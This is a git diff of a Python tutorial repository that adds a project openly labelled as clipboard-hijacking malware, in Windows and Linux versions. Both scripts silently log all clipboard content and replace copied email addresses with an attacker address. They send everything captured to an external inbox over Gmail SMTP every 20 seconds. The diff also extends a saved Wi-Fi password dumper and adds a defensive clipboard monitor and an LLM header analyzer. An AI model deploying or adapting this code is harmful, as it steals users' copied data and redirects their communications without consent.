diff --git a/README.md b/README.md
index ae2feec7..f620e0ce 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,11 @@
-
+
+
+
+
+
+
+
+
# Python Code Tutorials
@@ -21,6 +28,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Perform IP Address Spoofing in Python](https://thepythoncode.com/article/make-an-ip-spoofer-in-python-using-scapy). ([code](scapy/ip-spoofer))
- [How to See Hidden Wi-Fi Networks in Python](https://thepythoncode.com/article/uncovering-hidden-ssids-with-scapy-in-python). ([code](scapy/uncover-hidden-wifis))
- [Crafting Dummy Packets with Scapy Using Python](https://thepythoncode.com/article/crafting-packets-with-scapy-in-python). ([code](scapy/crafting-packets))
+ - [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system). ([code](scapy/honeypot-defense-system))
- [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
- [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
- [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
@@ -75,6 +83,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Perform Reverse DNS Lookups Using Python](https://thepythoncode.com/article/reverse-dns-lookup-with-python). ([code](ethical-hacking/reverse-dns-lookup))
- [How to Make a Clickjacking Vulnerability Scanner in Python](https://thepythoncode.com/article/make-a-clickjacking-vulnerability-scanner-with-python). ([code](ethical-hacking/clickjacking-scanner))
- [How to Build a Custom NetCat with Python](https://thepythoncode.com/article/create-a-custom-netcat-in-python). ([code](ethical-hacking/custom-netcat/))
+ - [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python). ([code](ethical-hacking/clipboard-hijacking-tool))
- ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
- ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
@@ -98,6 +107,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [Word Error Rate in Python](https://www.thepythoncode.com/article/calculate-word-error-rate-in-python). ([code](machine-learning/nlp/wer-score))
- [How to Calculate ROUGE Score in Python](https://www.thepythoncode.com/article/calculate-rouge-score-in-python). ([code](machine-learning/nlp/rouge-score))
- [Visual Question Answering with Transformers](https://www.thepythoncode.com/article/visual-question-answering-with-transformers-in-python). ([code](machine-learning/visual-question-answering))
+ - [Building a Full-Stack RAG Chatbot with FastAPI, OpenAI, and Streamlit](https://thepythoncode.com/article/build-rag-chatbot-fastapi-openai-streamlit). ([code](https://github.com/mahdjourOussama/python-learning/tree/master/chatbot-rag))
- ### [Computer Vision](https://www.thepythoncode.com/topic/computer-vision)
- [How to Detect Human Faces in Python using OpenCV](https://www.thepythoncode.com/article/detect-faces-opencv-python). ([code](machine-learning/face_detection))
- [How to Make an Image Classifier in Python using TensorFlow and Keras](https://www.thepythoncode.com/article/image-classification-keras-python). ([code](machine-learning/image-classifier))
@@ -180,6 +190,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Query the Ethereum Blockchain with Python](https://www.thepythoncode.com/article/query-ethereum-blockchain-with-python). ([code](general/query-ethereum))
- [Data Cleaning with Pandas in Python](https://www.thepythoncode.com/article/data-cleaning-using-pandas-in-python). ([code](general/data-cleaning-pandas))
- [How to Minify CSS with Python](https://www.thepythoncode.com/article/minimize-css-files-in-python). ([code](general/minify-css))
+ - [Build a real MCP client and server in Python with FastMCP (Todo Manager example)](https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager). ([code](general/fastmcp-mcp-client-server-todo-manager))
@@ -288,6 +299,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python). ([code](python-for-multimedia/compress-image))
- [How to Remove Metadata from an Image in Python](https://thepythoncode.com/article/how-to-clear-image-metadata-in-python). ([code](python-for-multimedia/remove-metadata-from-images))
- [How to Create Videos from Images in Python](https://thepythoncode.com/article/create-a-video-from-images-opencv-python). ([code](python-for-multimedia/create-video-from-images))
+ - [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python). ([code](python-for-multimedia/recover-deleted-files))
- ### [Web Programming](https://www.thepythoncode.com/topic/web-programming)
- [Detecting Fraudulent Transactions in a Streaming Application using Kafka in Python](https://www.thepythoncode.com/article/detect-fraudulent-transactions-with-apache-kafka-in-python). ([code](general/detect-fraudulent-transactions))
diff --git a/ethical-hacking/clipboard-hijacking-tool/README.md b/ethical-hacking/clipboard-hijacking-tool/README.md
new file mode 100644
index 00000000..05a3f405
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/README.md
@@ -0,0 +1,2 @@
+# [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python)
+This project demonstrates how to build clipboard-hijacking malware in Python. The script monitors the clipboard for changes, replaces copied email addresses with an attacker-controlled address, and periodically exfiltrates everything it captures via email.
\ No newline at end of file
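The hijacking decision the script makes each loop iteration can be factored into one small pure function. This is an illustrative sketch, not the PR's exact code — the `hijack` helper is hypothetical, though `EMAIL_REGEX` and `ATTACKER_EMAIL` mirror the script's constants:

```python
import re

# Same anchored pattern the script uses; with ^...$ anchors, search() behaves like fullmatch()
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$')
ATTACKER_EMAIL = "attacker@attack.com"

def hijack(text, last_hijacked=None):
    """Return the attacker address if `text` is a new victim email, else None."""
    if text and EMAIL_REGEX.match(text) and text not in (ATTACKER_EMAIL, last_hijacked):
        return ATTACKER_EMAIL
    return None
```

Keeping the decision separate from the clipboard I/O makes the replacement rule easy to unit-test without touching the Windows clipboard API.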
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
new file mode 100644
index 00000000..0fcbaeb0
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
@@ -0,0 +1,211 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration
+Monitors clipboard, hijacks emails, and exfiltrates collected data via email
+"""
+
+import win32clipboard
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "addyours@gmail.com"
+CHECK_INTERVAL = 1 # seconds between clipboard checks
+SEND_INTERVAL = 20 # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465  # implicit SSL/TLS port, matching smtplib.SMTP_SSL below
+SMTP_USERNAME = "addyours@gmail.com"
+SMTP_PASSWORD = "add yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+def get_clipboard_text():
+ """Safely get text from clipboard"""
+ try:
+ win32clipboard.OpenClipboard()
+ try:
+ data = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
+ if data:
+ return data.decode('utf-8').rstrip()
+ return None
+ except TypeError:
+ # Clipboard doesn't contain text
+ return None
+ finally:
+ win32clipboard.CloseClipboard()
+ except Exception as e:
+ return None
+
+def set_clipboard_text(text):
+ """Safely set clipboard text"""
+ try:
+ win32clipboard.OpenClipboard()
+ win32clipboard.EmptyClipboard()
+ win32clipboard.SetClipboardText(text, win32clipboard.CF_TEXT)
+ win32clipboard.CloseClipboard()
+ return True
+ except Exception as e:
+ try:
+ win32clipboard.CloseClipboard()
+ except:
+ pass
+ return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+ """Send collected clipboard data via email"""
+
+ if not clipboard_data and not hijacked_emails:
+ print("[*] No data to exfiltrate, skipping email")
+ return False
+
+ try:
+ # Create email
+ msg = MIMEMultipart()
+ msg['From'] = SMTP_USERNAME
+ msg['To'] = EXFILTRATION_EMAIL
+ msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+
+ # Build email body
+ body = "="*60 + "\n"
+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+ body += "="*60 + "\n\n"
+ body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+ body += f"Total Items Collected: {len(clipboard_data)}\n"
+ body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+ body += "\n" + "="*60 + "\n"
+
+ # Clipboard data section
+ if clipboard_data:
+ body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+ body += "\nAll captured clipboard content (comma-separated):\n"
+ body += ", ".join(clipboard_data)
+ body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+ for i, item in enumerate(clipboard_data, 1):
+ body += f"{i}. {item}\n"
+
+ # Hijacked emails section
+ if hijacked_emails:
+ body += "\n" + "="*60 + "\n"
+ body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+ body += "Comma-separated list:\n"
+ body += ", ".join(hijacked_emails)
+ body += "\n\nDetailed list:\n"
+ for i, email in enumerate(hijacked_emails, 1):
+ body += f"{i}. {email}\n"
+
+ body += "\n" + "="*60 + "\n"
+ body += "End of Report\n"
+ body += "="*60 + "\n"
+
+ msg.attach(MIMEText(body, 'plain'))
+
+        # Send the email over implicit TLS with smtplib.SMTP_SSL
+ print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+ with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+ server.login(SMTP_USERNAME, SMTP_PASSWORD)
+ server.send_message(msg)
+
+ print(f"[+] Successfully sent exfiltration email!")
+ print(f" - Clipboard items: {len(clipboard_data)}")
+ print(f" - Hijacked emails: {len(hijacked_emails)}\n")
+
+ return True
+
+ except smtplib.SMTPAuthenticationError:
+ print("[ERROR] SMTP Authentication failed!")
+ print("[!] Make sure you're using a Gmail App Password, not your regular password")
+ print("[!] Generate one at: https://myaccount.google.com/apppasswords")
+ return False
+ except Exception as e:
+ print(f"[ERROR] Failed to send email: {e}")
+ import traceback
+ traceback.print_exc()
+ return False
+
+def main():
+ """Main clipboard monitoring loop with periodic exfiltration"""
+ global clipboard_data, hijacked_emails
+
+ print("="*60)
+ print("Clipboard Email Hijacker with Data Exfiltration")
+ print("="*60)
+ print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+ print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+ print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+ print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+ print("[+] Press Ctrl+C to stop and exit\n")
+
+ hijack_count = 0
+ last_hijacked = None
+ last_send_time = time()
+ last_clipboard_content = None
+
+ try:
+ while True:
+ current_time = time()
+
+ # Get clipboard content
+ data = get_clipboard_text()
+
+ # Store ALL clipboard content (not just emails)
+ if data and data != last_clipboard_content:
+ clipboard_data.append(data)
+ last_clipboard_content = data
+ print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+
+ # Check if it's an email and hijack it
+ if data and re.search(EMAIL_REGEX, data):
+ if data != ATTACKER_EMAIL and data != last_hijacked:
+ print(f"[!] EMAIL DETECTED: {data}")
+
+ # Record the original email before hijacking
+ hijacked_emails.append(data)
+
+ if set_clipboard_text(ATTACKER_EMAIL):
+ hijack_count += 1
+ last_hijacked = data
+ print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+ print(f"[*] Total hijacks: {hijack_count}\n")
+
+ # Check if it's time to send exfiltration email
+ if current_time - last_send_time >= SEND_INTERVAL:
+ if send_exfiltration_email(clipboard_data, hijacked_emails):
+ # Clear the data after successful send
+ clipboard_data = []
+ hijacked_emails = []
+ print("[+] Data cleared, starting new collection cycle\n")
+
+ last_send_time = current_time
+
+ sleep(CHECK_INTERVAL)
+
+ except KeyboardInterrupt:
+ print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+ print(f"[*] Total emails hijacked: {hijack_count}")
+
+ # Send any remaining data before exit
+ if clipboard_data or hijacked_emails:
+ print("\n[*] Sending final exfiltration email with remaining data...")
+ send_exfiltration_email(clipboard_data, hijacked_emails)
+
+ print("\n[+] Program exited successfully")
+ sys.exit(0)
+
+ except Exception as e:
+ print(f"\n[ERROR] Unexpected error: {e}")
+ import traceback
+ traceback.print_exc()
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
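The exfiltration path above boils down to assembling a plain-text report and pushing it through `smtplib.SMTP_SSL`. A condensed sketch of those two steps (the `build_report`/`send_report` names are hypothetical; credentials are placeholders and a Gmail App Password is assumed):

```python
import smtplib
from email.mime.text import MIMEText

def build_report(clipboard_items, hijacked):
    """Assemble a plain-text report like the one the script emails."""
    lines = ["CLIPBOARD DATA EXFILTRATION REPORT",
             f"Items: {len(clipboard_items)}  Hijacked: {len(hijacked)}", ""]
    lines += [f"{i}. {item}" for i, item in enumerate(clipboard_items, 1)]
    return "\n".join(lines)

def send_report(body, sender, recipient, password):
    """Send the report over implicit TLS (port 465)."""
    msg = MIMEText(body, "plain")
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, "Clipboard report"
    with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
        server.login(sender, password)
        server.send_message(msg)
```

Separating report construction from sending lets the formatting be tested without network access.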
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
new file mode 100644
index 00000000..d1c78ab1
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
@@ -0,0 +1,251 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration - Linux Version
+"""
+
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+import subprocess
+import os
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "ADD YOURS@gmail.com"
+CHECK_INTERVAL = 1 # seconds between clipboard checks
+SEND_INTERVAL = 20 # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465
+SMTP_USERNAME = "ADD YOURS@gmail.com"
+SMTP_PASSWORD = "ADD Yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+# Detect clipboard tool
+CLIPBOARD_TOOL = None
+if os.system("which xclip > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "xclip"
+elif os.system("which xsel > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "xsel"
+elif os.system("which wl-paste > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "wayland"
+else:
+ print("[ERROR] No clipboard tool found!")
+ print("[!] Install: sudo apt-get install xclip")
+ sys.exit(1)
+
+def get_clipboard_text():
+ """Safely get text from clipboard"""
+ try:
+ if CLIPBOARD_TOOL == "xclip":
+ result = subprocess.run(
+ ["xclip", "-selection", "clipboard", "-o"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ elif CLIPBOARD_TOOL == "xsel":
+ result = subprocess.run(
+ ["xsel", "--clipboard", "--output"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ elif CLIPBOARD_TOOL == "wayland":
+ result = subprocess.run(
+ ["wl-paste"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ else:
+ return None
+
+ if result.returncode == 0:
+ return result.stdout.rstrip()
+ return None
+    except Exception:
+        return None
+
+def set_clipboard_text(text):
+ """Safely set clipboard text"""
+ try:
+ if CLIPBOARD_TOOL == "xclip":
+ process = subprocess.Popen(
+ ["xclip", "-selection", "clipboard", "-i"],
+ stdin=subprocess.PIPE
+ )
+ elif CLIPBOARD_TOOL == "xsel":
+ process = subprocess.Popen(
+ ["xsel", "--clipboard", "--input"],
+ stdin=subprocess.PIPE
+ )
+ elif CLIPBOARD_TOOL == "wayland":
+ process = subprocess.Popen(
+ ["wl-copy"],
+ stdin=subprocess.PIPE
+ )
+ else:
+ return False
+
+ process.communicate(input=text.encode('utf-8'), timeout=2)
+ return process.returncode == 0
+    except Exception:
+        return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+ """Send collected clipboard data via email"""
+
+ if not clipboard_data and not hijacked_emails:
+ print("[*] No data to exfiltrate, skipping email")
+ return False
+
+ try:
+ # Create email
+ msg = MIMEMultipart()
+ msg['From'] = SMTP_USERNAME
+ msg['To'] = EXFILTRATION_EMAIL
+ msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+
+ # Build email body
+ body = "="*60 + "\n"
+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+ body += "="*60 + "\n\n"
+ body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+ body += f"Total Items Collected: {len(clipboard_data)}\n"
+ body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+ body += "\n" + "="*60 + "\n"
+
+ # Clipboard data section
+ if clipboard_data:
+ body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+ body += "\nAll captured clipboard content (comma-separated):\n"
+ body += ", ".join(clipboard_data)
+ body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+ for i, item in enumerate(clipboard_data, 1):
+ body += f"{i}. {item}\n"
+
+ # Hijacked emails section
+ if hijacked_emails:
+ body += "\n" + "="*60 + "\n"
+ body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+ body += "Comma-separated list:\n"
+ body += ", ".join(hijacked_emails)
+ body += "\n\nDetailed list:\n"
+ for i, email in enumerate(hijacked_emails, 1):
+ body += f"{i}. {email}\n"
+
+ body += "\n" + "="*60 + "\n"
+ body += "End of Report\n"
+ body += "="*60 + "\n"
+
+ msg.attach(MIMEText(body, 'plain'))
+
+ # Send email using SMTP_SSL
+ print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+ with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+ server.login(SMTP_USERNAME, SMTP_PASSWORD)
+ server.send_message(msg)
+
+ print(f"[+] Successfully sent exfiltration email!")
+ print(f" - Clipboard items: {len(clipboard_data)}")
+ print(f" - Hijacked emails: {len(hijacked_emails)}\n")
+
+ return True
+
+ except smtplib.SMTPAuthenticationError:
+ print("[ERROR] SMTP Authentication failed!")
+ print("[!] Make sure you're using a Gmail App Password, not your regular password")
+ return False
+ except Exception as e:
+ print(f"[ERROR] Failed to send email: {e}")
+ import traceback
+ traceback.print_exc()
+ return False
+
+def main():
+ """Main clipboard monitoring loop with periodic exfiltration"""
+ global clipboard_data, hijacked_emails
+
+ print("="*60)
+ print("Clipboard Email Hijacker - Linux Version")
+ print("="*60)
+ print(f"[+] Clipboard tool: {CLIPBOARD_TOOL}")
+ print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+ print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+ print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+ print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+ print("[+] Press Ctrl+C to stop and exit\n")
+
+ hijack_count = 0
+ last_hijacked = None
+ last_send_time = time()
+ last_clipboard_content = None
+
+ try:
+ while True:
+ current_time = time()
+
+ # Get clipboard content
+ data = get_clipboard_text()
+
+ # Store ALL clipboard content (not just emails)
+ if data and data != last_clipboard_content:
+ clipboard_data.append(data)
+ last_clipboard_content = data
+ print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+
+ # Check if it's an email and hijack it
+ if data and re.search(EMAIL_REGEX, data):
+ if data != ATTACKER_EMAIL and data != last_hijacked:
+ print(f"[!] EMAIL DETECTED: {data}")
+
+ # Record the original email before hijacking
+ hijacked_emails.append(data)
+
+ if set_clipboard_text(ATTACKER_EMAIL):
+ hijack_count += 1
+ last_hijacked = data
+ print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+ print(f"[*] Total hijacks: {hijack_count}\n")
+
+ # Check if it's time to send exfiltration email
+ if current_time - last_send_time >= SEND_INTERVAL:
+ if send_exfiltration_email(clipboard_data, hijacked_emails):
+ # Clear the data after successful send
+ clipboard_data = []
+ hijacked_emails = []
+ print("[+] Data cleared, starting new collection cycle\n")
+
+ last_send_time = current_time
+
+ sleep(CHECK_INTERVAL)
+
+ except KeyboardInterrupt:
+ print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+ print(f"[*] Total emails hijacked: {hijack_count}")
+
+ # Send any remaining data before exit
+ if clipboard_data or hijacked_emails:
+ print("\n[*] Sending final exfiltration email with remaining data...")
+ send_exfiltration_email(clipboard_data, hijacked_emails)
+
+ print("\n[+] Program exited successfully")
+ sys.exit(0)
+
+ except Exception as e:
+ print(f"\n[ERROR] Unexpected error: {e}")
+ import traceback
+ traceback.print_exc()
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
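The Linux script probes for a clipboard CLI by shelling out with `os.system("which …")`. The stdlib `shutil.which` expresses the same check without spawning a shell — a sketch under that assumption, not the PR's code:

```python
import shutil

def detect_clipboard_tool():
    """Return the first available clipboard CLI ('xclip', 'xsel', or 'wl-paste'), or None."""
    for tool in ("xclip", "xsel", "wl-paste"):
        if shutil.which(tool):  # resolves against PATH, no subprocess needed
            return tool
    return None
```

`shutil.which` also returns the resolved path, which is handy if the tool later needs to be invoked by absolute path.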
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
new file mode 100644
index 00000000..5d3fcebc
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
@@ -0,0 +1,79 @@
+import win32gui
+import win32api
+import ctypes
+from win32clipboard import GetClipboardOwner
+from win32process import GetWindowThreadProcessId
+from psutil import Process
+import winsound
+import sys
+import signal
+
+def handle_clipboard_event(window_handle, message, w_param, l_param):
+ if message == 0x031D: # WM_CLIPBOARDUPDATE
+ try:
+ clipboard_owner_window = GetClipboardOwner()
+ process_id = GetWindowThreadProcessId(clipboard_owner_window)[1]
+ process = Process(process_id)
+ process_name = process.name()
+
+ # Successfully identified the process - no beep
+ print("Clipboard modified by %s" % process_name)
+
+ except Exception:
+ # Could not identify the process - BEEP!
+ print("Clipboard modified by unknown process")
+ winsound.Beep(1000, 300)
+
+ return 0
+
+
+def create_listener_window():
+ window_class = win32gui.WNDCLASS()
+ window_class.lpfnWndProc = handle_clipboard_event
+ window_class.lpszClassName = 'clipboardListener'
+ window_class.hInstance = win32api.GetModuleHandle(None)
+
+ class_atom = win32gui.RegisterClass(window_class)
+
+ return win32gui.CreateWindow(
+ class_atom,
+ 'clipboardListener',
+ 0,
+ 0, 0, 0, 0,
+ 0, 0,
+ window_class.hInstance,
+ None
+ )
+
+
+def signal_handler(sig, frame):
+ print("\n[+] Exiting...")
+ sys.exit(0)
+
+
+def start_clipboard_monitor():
+ print("[+] Clipboard listener started")
+ print("[+] Press Ctrl+C to exit\n")
+
+ # Set up signal handler for Ctrl+C
+ signal.signal(signal.SIGINT, signal_handler)
+
+ listener_window = create_listener_window()
+ ctypes.windll.user32.AddClipboardFormatListener(listener_window)
+
+ # Pump messages but check for exit condition
+ try:
+ while True:
+ # Process messages with a timeout to allow checking for exit
+ if win32gui.PumpWaitingMessages() != 0:
+ break
+ win32api.Sleep(100) # Sleep a bit to prevent high CPU usage
+ except KeyboardInterrupt:
+ print("\n[+] Exiting...")
+ finally:
+ # Clean up - remove clipboard listener
+ ctypes.windll.user32.RemoveClipboardFormatListener(listener_window)
+
+
+if __name__ == "__main__":
+ start_clipboard_monitor()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/requirements.txt b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
new file mode 100644
index 00000000..afd24f6a
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
@@ -0,0 +1,2 @@
+pywin32
+psutil
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/README.md b/ethical-hacking/get-wifi-passwords/README.md
index e24eda7f..a10efc10 100644
--- a/ethical-hacking/get-wifi-passwords/README.md
+++ b/ethical-hacking/get-wifi-passwords/README.md
@@ -1 +1,3 @@
-# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
\ No newline at end of file
+# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
+
+This program lists saved Wi-Fi networks and their passwords on Windows and Linux machines. In addition to the SSID (Wi-Fi network name) and passwords, the output also shows the network’s security type and ciphers.
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
index 0afd70ca..ff32f6f8 100644
--- a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
+++ b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
@@ -28,10 +28,16 @@ def get_windows_saved_wifi_passwords(verbose=1):
[list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"]
"""
ssids = get_windows_saved_ssids()
- Profile = namedtuple("Profile", ["ssid", "ciphers", "key"])
+ Profile = namedtuple("Profile", ["ssid", "security", "ciphers", "key"])
profiles = []
for ssid in ssids:
ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode()
+
+    # get the security type
+ security = re.findall(r"Authentication\s(.*)", ssid_details)
+ # clear spaces and colon
+ security = "/".join(dict.fromkeys(c.strip().strip(":").strip() for c in security))
+
# get the ciphers
ciphers = re.findall(r"Cipher\s(.*)", ssid_details)
# clear spaces and colon
@@ -43,7 +49,7 @@ def get_windows_saved_wifi_passwords(verbose=1):
key = key[0].strip().strip(":").strip()
except IndexError:
key = "None"
- profile = Profile(ssid=ssid, ciphers=ciphers, key=key)
+ profile = Profile(ssid=ssid, security=security, ciphers=ciphers, key=key)
if verbose >= 1:
print_windows_profile(profile)
profiles.append(profile)
@@ -52,12 +58,13 @@ def get_windows_saved_wifi_passwords(verbose=1):
def print_windows_profile(profile):
"""Prints a single profile on Windows"""
- print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+    print(f"{profile.ssid:25}{profile.security:30}{profile.ciphers:35}{profile.key:50}")
def print_windows_profiles(verbose):
"""Prints all extracted SSIDs along with Key on Windows"""
- print("SSID CIPHER(S) KEY")
+    print("SSID                     SECURITY                      CIPHER(S)                          KEY")
print("-"*50)
get_windows_saved_wifi_passwords(verbose)
diff --git a/ethical-hacking/http-security-headers/README.md b/ethical-hacking/http-security-headers/README.md
new file mode 100644
index 00000000..e0e7b1d0
--- /dev/null
+++ b/ethical-hacking/http-security-headers/README.md
@@ -0,0 +1,2 @@
+Grab your API key from OpenRouter: https://openrouter.ai/
+The model used is DeepSeek V3.1 (free); feel free to try others.
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/http_security_headers.py b/ethical-hacking/http-security-headers/http_security_headers.py
new file mode 100644
index 00000000..67b494c4
--- /dev/null
+++ b/ethical-hacking/http-security-headers/http_security_headers.py
@@ -0,0 +1,149 @@
+#!/usr/bin/env python3
+import requests
+import json
+import os
+import argparse
+from typing import Dict, List, Tuple
+from openai import OpenAI
+
+class SecurityHeadersAnalyzer:
+ def __init__(self, api_key: str = None, base_url: str = None, model: str = None):
+ self.api_key = api_key or os.getenv('OPENROUTER_API_KEY') or os.getenv('OPENAI_API_KEY')
+ self.base_url = base_url or os.getenv('OPENROUTER_BASE_URL', 'https://openrouter.ai/api/v1')
+ self.model = model or os.getenv('LLM_MODEL', 'deepseek/deepseek-chat-v3.1:free')
+
+ if not self.api_key:
+ raise ValueError("API key is required. Set OPENROUTER_API_KEY or provide --api-key")
+
+ self.client = OpenAI(base_url=self.base_url, api_key=self.api_key)
+
+ def fetch_headers(self, url: str, timeout: int = 10) -> Tuple[Dict[str, str], int]:
+ """Fetch HTTP headers from URL"""
+ if not url.startswith(('http://', 'https://')):
+ url = 'https://' + url
+
+ try:
+ response = requests.get(url, timeout=timeout, allow_redirects=True)
+ return dict(response.headers), response.status_code
+ except requests.exceptions.RequestException as e:
+ print(f"Error fetching {url}: {e}")
+ return {}, 0
+
+ def analyze_headers(self, url: str, headers: Dict[str, str], status_code: int) -> str:
+ """Analyze headers using LLM"""
+ prompt = f"""Analyze the HTTP security headers for {url} (Status: {status_code})
+
+Headers:
+{json.dumps(headers, indent=2)}
+
+Provide a comprehensive security analysis including:
+1. Security score (0-100) and overall assessment
+2. Critical security issues that need immediate attention
+3. Missing important security headers
+4. Analysis of existing security headers and their effectiveness
+5. Specific recommendations for improvement
+6. Potential security risks based on current configuration
+
+Focus on practical, actionable advice following current web security best practices. Do not use Markdown symbols such as ** or # in the response except where strictly necessary;
+use numbers, Roman numerals, or letters for structure instead, and format the response cleanly."""
+
+ try:
+ completion = self.client.chat.completions.create(
+ model=self.model,
+ messages=[{"role": "user", "content": prompt}],
+ temperature=0.2
+ )
+ return completion.choices[0].message.content
